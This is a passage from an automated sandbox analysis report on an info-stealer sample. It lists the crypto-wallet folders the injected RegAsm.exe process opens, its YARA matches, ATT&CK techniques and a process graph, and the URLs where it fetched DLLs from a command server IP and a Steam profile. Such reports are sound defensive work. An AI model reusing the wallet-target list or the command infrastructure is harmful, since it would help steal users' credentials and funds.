                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 7420, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7440, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1994D9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1994D9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198C5910 sqlite3_mprintf,sqlite3_bind_int64,1_2_198C5910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1989DB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_1989DB10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19835C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_19835C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1989DFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,1_2_1989DFC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198A1FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_198A1FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198C51D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_198C51D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198B9090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,1_2_198B9090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198DD3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_198DD3B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198C55B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_198C55B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199414D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,1_2_199414D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1994D4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,1_2_1994D4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198FD610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_198FD610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19834820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,1_2_19834820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19904D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,1_2_19904D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19850FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,1_2_19850FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19898200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,1_2_19898200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19878550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,1_2_19878550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19848680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,1_2_19848680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198706E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,1_2_198706E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1984B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,1_2_1984B400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199037E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_199037E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198E3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_198E3770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1987EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,1_2_1987EF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1989E170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,1_2_1989E170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1988E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_1988E090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1988E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,1_2_1988E200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198366C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,1_2_198366C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1989A6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,1_2_1989A6F0
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API
                  Boot or Logon Initialization Scripts411
                  Process Injection
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  1
                  Account Discovery
                  Remote Desktop Protocol4
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Software Packing
                  Security Account Manager4
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS154
                  System Information Discovery
                  Distributed Component Object ModelInput Capture14
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets1
                  Network Share Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials141
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
                  Process Injection
                  DCSync1
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1433685 Sample: file.exe Startdate: 29/04/2024 Architecture: WINDOWS Score: 100 50 steamcommunity.com 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 6 other signatures 2->64 9 file.exe 2->9         started        12 chrome.exe 1 2->12         started        15 chrome.exe 2->15         started        signatures3 process4 dnsIp5 74 Writes to foreign memory regions 9->74 76 Allocates memory in foreign processes 9->76 78 Injects a PE file into a foreign processes 9->78 17 RegAsm.exe 10 36 9->17         started        52 192.168.2.4, 138, 443, 49591 unknown unknown 12->52 54 192.168.2.6 unknown unknown 12->54 56 239.255.255.250 unknown Reserved 12->56 22 chrome.exe 12->22         started        24 chrome.exe 12->24         started        26 chrome.exe 15->26         started        signatures6 process7 dnsIp8 42 95.217.242.142, 443, 49731, 49732 HETZNER-ASDE Germany 17->42 44 steamcommunity.com 23.210.138.105, 443, 49730 AKAMAI-ASUS United States 17->44 34 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 17->34 dropped 36 C:\Users\user\AppData\...\softokn3[1].dll, PE32 17->36 dropped 38 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 17->38 dropped 40 10 other files (none is malicious) 17->40 dropped 66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->66 68 Found many strings related to Crypto-Wallets (likely being stolen) 17->68 70 Found evasive API chain (may stop execution after checking computer name) 17->70 72 7 other signatures 17->72 28 cmd.exe 1 17->28         started        46 www.google.com 142.250.191.164, 443, 49738, 49739 GOOGLEUS United States 22->46 48 142.250.191.196, 443, 49779 GOOGLEUS United States 24->48 file9 signatures10 process11 process12 30 conhost.exe 28->30         started        32 timeout.exe 1 28->32         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe32%ReversingLabs
                  file.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\ProgramData\KFBFCAFCBKFI\freebl3.dll0%ReversingLabs
                  C:\ProgramData\KFBFCAFCBKFI\mozglue.dll0%ReversingLabs
                  C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\KFBFCAFCBKFI\nss3.dll0%ReversingLabs
                  C:\ProgramData\KFBFCAFCBKFI\softokn3.dll0%ReversingLabs
                  C:\ProgramData\KFBFCAFCBKFI\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://mozilla.org0/0%URL Reputationsafe
                  https://95.217.242.142/msvcp140.dll0%Avira URL Cloudsafe
                  https://95.217.242.1420%Avira URL Cloudsafe
                  https://95.217.242.142/mozglue.dll0%Avira URL Cloudsafe
                  https://95.217.242.142HJE0%Avira URL Cloudsafe
                  https://95.217.242.142/0%Avira URL Cloudsafe
                  https://95.217.242.142/msvcp140.dll/0%Avira URL Cloudsafe
                  https://support.mic.BF0%Avira URL Cloudsafe
                  https://95.217.242.142/vcruntime140.dll0%Avira URL Cloudsafe
                  https://95.217.242.14217d99a9f0nt-Disposition:0%Avira URL Cloudsafe
                  https://95.217.242.142/mozglue.dll;0%Avira URL Cloudsafe
                  https://95.217.242.142/sqlx.dll0%Avira URL Cloudsafe
                  https://95.217.242.142/freebl3.dll70%Avira URL Cloudsafe
                  https://95.217.242.142/msvcp140.dlly0%Avira URL Cloudsafe
                  https://95.217.242.142/vcruntime140.dllp0%Avira URL Cloudsafe
                  https://95.217.242.142/freebl3.dll0%Avira URL Cloudsafe
                  https://support.office.c0%Avira URL Cloudsafe
                  https://95.217.242.142/nss3.dll0%Avira URL Cloudsafe
                  https://95.217.242.142/softokn3.dlli0%Avira URL Cloudsafe
                  https://95.217.242.142/softokn3.dll0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  steamcommunity.com
                  23.210.138.105
                  truefalse
                    high
                    www.google.com
                    142.250.191.164
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://95.217.242.142/msvcp140.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://95.217.242.142/vcruntime140.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://95.217.242.142/mozglue.dllfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://steamcommunity.com/profiles/76561199680449169false
                        high
                        https://95.217.242.142/false
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGM_-v7EGIjCEhPLSBTrZPAY39cVYHNd6_L3Rxj8WO6tEohgLxJlwyjn4Ct7LVz-jrTx9H46727MyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                          high
                          https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                            high
                            https://95.217.242.142/sqlx.dllfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://95.217.242.142/freebl3.dllfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://95.217.242.142/softokn3.dllfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/async/newtab_promosfalse
                              high
                              https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGM_-v7EGIjC59ZRJ1dYmOVgs9zYixs7a6VS3cYG9RFenPtHDW-sQCDxbcp_6fD5d67UVJ_1caB4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUMfalse
                                high
                                https://95.217.242.142/nss3.dllfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/async/ddljson?async=ntp:2false
                                  high
                                  https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabBGCBGCAF.1.drfalse
                                      high
                                      https://duckduckgo.com/ac/?q=BGCBGCAF.1.drfalse
                                        high
                                        https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                          high
                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&aRegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                            high
                                            https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                              high
                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                high
                                                https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=englRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                  high
                                                  http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                    high
                                                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                      high
                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                        high
                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                          high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exeRegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17eRegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              high
                                                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                high
                                                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                  high
                                                                  https://95.217.242.14276561199680449169[1].htm.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                    high
                                                                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                      high
                                                                      https://95.217.242.142HJERegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=enRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                        high
                                                                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                          high
                                                                          https://steamcommunity.com/profiles/76561199680449169jQRegAsm.exe, 00000001.00000002.2107817674.0000000000F85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&amRegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                              high
                                                                              https://95.217.242.142/msvcp140.dll/RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                high
                                                                                http://www.mozilla.com/en-US/blocklist/mozglue.dll.1.dr, mozglue[1].dll.1.drfalse
                                                                                  high
                                                                                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&l=eRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                    high
                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drfalse
                                                                                      high
